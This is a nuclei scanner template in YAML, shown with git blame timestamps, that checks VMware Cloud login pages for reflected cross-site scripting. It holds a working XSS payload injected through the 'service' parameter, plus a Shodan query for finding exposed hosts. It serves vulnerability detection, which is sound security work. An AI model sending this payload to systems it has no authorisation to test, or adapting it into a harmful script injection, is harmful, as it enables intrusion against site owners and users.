nuclei-templates/http/vulnerabilities/vmware/vmware-cloud-xss.yaml

36 lines
987 B
YAML
Raw Normal View History

2023-01-25 10:45:20 +00:00
id: vmware-cloud-xss
2023-01-23 18:39:37 +00:00
info:
name: VMWare Cloud - Cross Site Scripting
author: tess
severity: medium
2024-01-15 11:44:47 +00:00
description: VMWare Cloud is vulnerable to Reflected Cross Site Scripting vulnerability.
2023-01-23 18:39:37 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-01-25 10:45:20 +00:00
shodan-query: title:"Vmware Cloud"
tags: vmware,xss,cloud
2023-01-23 18:39:37 +00:00
http:
2023-01-23 18:39:37 +00:00
- method: GET
path:
- '{{BaseURL}}/login/?redirectTo=/tenant/e&service=</script><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
2023-01-25 10:45:20 +00:00
- 'let tokens = "'
2023-01-23 18:39:37 +00:00
condition: and
- type: word
part: header
words:
2023-01-25 10:45:20 +00:00
- 'text/html'
2023-01-23 18:39:37 +00:00
- type: status
status:
- 200
# digest: 490a0046304402205d88d88853e066013a32d7ed78c77379b08fbe8c98a298a83502d5a067bbc726022009d488077eb6df2ebe8abd3325fd96f823689b9ba487057fdb64f6e41fc8d869:922c64590222798bb761d5b6d8e72950